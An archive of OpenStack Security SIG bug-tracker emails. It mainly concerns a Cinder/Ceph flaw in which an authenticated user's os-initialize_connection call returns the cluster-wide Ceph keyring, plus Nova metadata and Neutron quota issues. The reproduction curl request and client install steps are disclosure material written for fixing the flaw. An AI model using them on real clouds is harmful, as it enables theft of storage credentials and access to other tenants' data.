Message-ID: <157244741788.28040.5608641862510499734.malone@chaenomeles.canonical.com> Using the Cinder part of the bug to track deprecating the option for removal in V; deprecation notice should reference the OSSN. ** Changed in: cinder Importance: Undecided => Low ** Changed in: cinder Status: New => In Progress ** Changed in: cinder Milestone: None => ussuri-1 ** Changed in: cinder Assignee: Eric Harney (eharney) => Brian Rosmaita (brian-rosmaita) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1841933 at bugs.launchpad.net Thu Oct 31 09:33:28 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 09:33:28 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <157251441052.2581.5345193395515345805.launchpad@gac.canonical.com> ** Changed in: nova Assignee: Kobi Samoray (ksamoray) => Adit Sarfaty (asarfaty) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Oct 31 12:44:13 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 31 Oct 2019 12:44:13 -0000 Subject: [Openstack-security] [Bug 1850274] Re: Updating any neutron quota for non-existent project works References: <157234128665.19064.3192264662500421555.malonedeb@wampee.canonical.com> Message-ID: <157252585337.28040.16698714676839296799.malone@chaenomeles.canonical.com> Thanks for the feedback everyone, I've switched this to a regular public bug and set the security advisory task to won't fix, treating it as a class D report (hardening opportunity) per the OpenStack VMT's report taxonomy: https://security.openstack.org/vmt-process.html#incident- report-taxonomy ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - When we try to update a neutron quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850274 Title: Updating any neutron quota for non-existent project works Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a neutron quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1850274/+subscriptions From 1850274 at bugs.launchpad.net Thu Oct 31 12:59:18 2019 From: 1850274 at bugs.launchpad.net (Slawek Kaplonski) Date: Thu, 31 Oct 2019 12:59:18 -0000 Subject: [Openstack-security] [Bug 1850274] Re: Updating any neutron quota for non-existent project works References: <157234128665.19064.3192264662500421555.malonedeb@wampee.canonical.com> Message-ID: <157252675990.2947.3533003254343099924.launchpad@gac.canonical.com> ** Changed in: neutron Status: New => Confirmed ** Changed in: neutron Importance: Undecided => Low -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850274 Title: Updating any neutron quota for non-existent project works Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a neutron quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1850274/+subscriptions From rosmaita.fossdev at gmail.com Thu Oct 31 13:35:11 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 31 Oct 2019 13:35:11 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157252891131.18907.3061396779964503237.malone@wampee.canonical.com> OSSN patch is https://review.opendev.org/#/c/692256/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From rosmaita.fossdev at gmail.com Thu Oct 31 13:39:13 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 31 Oct 2019 13:39:13 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157252915333.19263.11200748553583917338.malone@wampee.canonical.com> A note about step 2 in the Quick Workaround in the bug description: Gorka Eguileor noticed that the correct file location is actually: /etc/ceph/.client..keyring See https://opendev.org/openstack/os- brick/src/commit/87171abef8bf2336f15ce3a7949f77d7999e11b7/os_brick/initiator/connectors/rbd.py#L76 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From gagehugo at gmail.com Thu Oct 31 15:28:12 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Thu, 31 Oct 2019 15:28:12 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157253569375.19346.16448407373152762427.launchpad@wampee.canonical.com> ** Changed in: ossn Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: In Progress Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1849624 at bugs.launchpad.net Thu Oct 31 18:53:07 2019 From: 1849624 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 18:53:07 -0000 Subject: [Openstack-security] [Bug 1849624] Fix proposed to cinder (master) References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157254798767.2581.7956261386549652544.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/692428 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: In Progress Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1841933 at bugs.launchpad.net Thu Oct 31 19:47:04 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 19:47:04 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <157255122691.27964.1132765436268433555.launchpad@chaenomeles.canonical.com> ** Changed in: nova Assignee: Adit Sarfaty (asarfaty) => Kobi Samoray (ksamoray) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions